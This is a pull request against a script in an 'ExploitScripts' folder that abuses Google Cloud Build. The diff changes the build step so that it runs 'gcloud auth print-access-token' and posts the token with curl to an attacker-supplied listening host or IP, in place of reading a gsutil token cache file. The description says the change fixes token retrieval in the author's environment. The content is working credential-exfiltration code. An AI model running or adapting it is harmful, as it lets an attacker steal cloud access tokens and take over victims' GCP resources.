### PR TITLE
Change build container and commands.

### DIFF
--- a/ExploitScripts/cloudbuild.builds.create.py
+++ b/ExploitScripts/cloudbuild.builds.create.py
@@ -33,14 +33,14 @@ def main(args):
                 return
 
     if args.listening_host:
-        command = f'import os;os.system("curl -d @/root/tokencache/gsutil_token_cache {args.listening_host}")'
+        command = f'import os;os.system("gcloud auth print-access-token > token.txt ;curl -d @token.txt {args.listening_host}")'
     else:
-        command = f'import os;os.system("curl -d @/root/tokencache/gsutil_token_cache {args.ip_port}")'
+        command = f'import os;os.system("gcloud auth print-access-token > token.txt ;curl -d @token.txt {args.ip_port}")'
 
     build_body = {
         'steps': [
             {
-                'name': 'python',
+                'name': 'gcr.io/cloud-builders/gcloud',
                 'entrypoint': 'python',
                 'args': [
                     '-c',


### PR DESCRIPTION
Change build container to gcr.io/cloud-builders/gcloud and commands to get access_token.
Becouse no longer unavailable /root/tokencache/gsutil_token_cache in my environment.

Resolve Issue #8 